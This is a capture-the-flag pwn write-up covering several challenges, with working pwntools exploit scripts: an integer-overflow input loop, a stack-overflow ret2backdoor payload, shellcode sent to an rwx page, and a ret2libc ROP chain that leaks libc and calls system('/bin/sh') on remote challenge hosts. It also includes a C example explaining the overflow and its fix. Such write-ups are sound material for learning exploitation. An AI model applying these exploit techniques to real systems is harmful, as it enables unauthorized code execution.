
PWN1

GNU Debugger

Start the target and run it:

We need the value of the r12 register, so look it up in the registers window:

Copy the value over.

Level 2:

Use telescope to inspect the address:

telescope 0x555555557c27

Copy it and move on to the next level.

Set a breakpoint at this location with b:

b *(0x555555555779)

Use the set command to write 0xdeadbeef to that address:

set *(0x7fffffffdce4)=0xdeadbeef

INTbug

checksec:

64-bit with all protections enabled; open it in IDA.

It performs a single scanf and only accepts positive numbers, but the comparison has to see a negative value before it will cat the flag, which points to an integer overflow.

Also, the scanf format string is %1d, so each read consumes only one digit.

So send the input in a loop; once more than 32766 inputs have been sent, the value overflows and turns negative.

exp:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("8.147.134.121", 22904)

# scanf("%1d") consumes one digit per read, so send a single digit each time
for i in range(32767):
    p.send(b'1')

p.interactive()
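
The INTbug accumulation described above, as an added example that is not the challenge's code or the writeup's exploit: a reconstructed model of a 16-bit signed total fed one %1d digit per input, beside a hardened version that accumulates in a wider type and rejects any step past INT16_MAX. The 16-bit width and zero starting value are assumptions; the page does not show the binary's source.

```c
#include <limits.h>
#include <stdint.h>
#include <stdio.h>

/* Vulnerable model (assumed): each scanf("%1d") result is added to a 16-bit
 * signed total. The int -> int16_t conversion is implementation-defined and
 * wraps on ordinary two's-complement targets, so enough positive digits
 * drive the total negative and satisfy a "total < 0" check. */
int16_t total_unchecked(size_t n_inputs, int digit)
{
    int16_t total = 0;
    for (size_t i = 0; i < n_inputs; i++)
        total += (int16_t)digit;            /* silent wrap past INT16_MAX */
    return total;
}

/* Hardened form: accumulate in a wider type, enforce the single-digit
 * contract, and refuse any step that would exceed INT16_MAX instead of
 * letting the conversion wrap. Returns the total, or -1 if rejected. */
int32_t total_checked(size_t n_inputs, int digit)
{
    int32_t total = 0;
    if (digit < 0 || digit > 9)
        return -1;                          /* not a valid %1d result */
    for (size_t i = 0; i < n_inputs; i++) {
        if (total > INT16_MAX - digit)
            return -1;                      /* would overflow int16_t */
        total += digit;
    }
    return total;
}

int main(void)
{
    /* 32767 ones just reach INT16_MAX; one more wraps the unchecked total. */
    printf("unchecked: %d after 32767, %d after 32768\n",
           total_unchecked(32767, 1), total_unchecked(32768, 1));
    printf("checked:   %d after 32767, %d after 32768 (-1 = rejected)\n",
           total_checked(32767, 1), total_checked(32768, 1));
    return 0;
}
```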

pwn’s door

checksec:

PIE is disabled. IDA64:

Entering 7038329 directly yields a shell.

overflow

checksec:

All protections are off. Open it in IDA64:

There is a backdoor function, and gets allows unbounded input, so this is a straightforward stack overflow.

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# p = process('./overflow')   # local run; the remote connection below replaces it
p = remote("8.147.134.121", 35190)
# pad up to the saved return address (0x100 + 8 bytes), then overwrite it with the backdoor
payload = b'a' * (0x100 + 8) + p64(0x401201)
p.sendline(payload)

p.interactive()

input_function

checksec:

No canary. IDA64:

It mmaps an rwx page and then reads into it, so just send shellcode.

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# p = process('./input_function')   # local run; the remote connection below replaces it
p = remote("8.147.132.32", 14362)
# the input lands in the rwx mmap page and is executed there
shellcode = asm(shellcraft.sh())

p.send(shellcode)
p.interactive()

WEEK2

calc_beta

checksec:

PIE is disabled. Open it in IDA64.

Look at editnumbers.

It accepts indices 0-17. Testing shows that after entering 0, the next value entered is jumped to as an address, and execution then continues with the statements below it.

So this can be used to build a ROP chain, effectively a variant of ret2libc.

exp:

from pwn import *
# from LibcSearcher import *   # only needed for the commented-out LibcSearcher path below
context.log_level = 'debug'
# enter 0: return to entered addr
p = process('./calc')
#p = remote("39.106.57.152", 32844)
elf = ELF('./calc')
libc = ELF('./libc.so.6')
write_plt = elf.plt['write']
write_got = elf.got['write']

#gdb.attach(p)
pop_rdi_ret = 0x0000000000401253
pop_rsi_r15_ret = 0x0000000000401251
main_addr = 0x4010b4
ret_addr = 0x00000000004006b6

# Round 1: fill slots 1-7 with write(1, write_got) followed by a return to main,
# then use slot 0 to jump to pop rdi; ret, which leaks the libc address of write.
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'1')
p.sendlineafter(b"> ", str(1).encode())               # rdi = 1 (stdout)

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", str(pop_rsi_r15_ret).encode())

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'3')
p.sendlineafter(b"> ", str(write_got).encode())       # rsi = write@got

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'4')
p.sendlineafter(b"> ", str(0).encode())               # r15 = 0 (junk)

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'5')
p.sendlineafter(b"> ", str(write_plt).encode())

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'6')
p.sendlineafter(b"> ", str(ret_addr).encode())        # keep the stack aligned

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'7')
p.sendlineafter(b"> ", str(main_addr).encode())       # back to main for round 2

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'0')
#pause()
p.sendafter(b"> ", str(pop_rdi_ret).encode())

# 0x114870 is the offset of write in the provided libc.so.6
libc_addr = u64(p.recv(6).ljust(8, b'\x00')) - 0x114870
write_addr = libc_addr + 0x114870
'''
libc = LibcSearcher('write', write_addr)
offset = write_addr - libc.dump('write')
binsh = offset + libc.dump('str_bin_sh')
system = offset + libc.dump('system')
'''
print(hex(libc_addr))
pause()
binsh = libc_addr + next(libc.search(b'/bin/sh'))
system = libc_addr + libc.sym['system']
print(hex(binsh))
print(hex(system))

# Round 2: slots 1-3 become "/bin/sh", ret, system; slot 0 jumps to pop rdi; ret again
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'1')
p.sendlineafter(b"> ", str(binsh).encode())           # rdi = "/bin/sh"

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", str(ret_addr).encode())        # alignment before system

p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'3')
p.sendlineafter(b"> ", str(system).encode())
#pause()
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'0')
p.sendafter(b"> ", str(pop_rdi_ret).encode())

p.interactive()
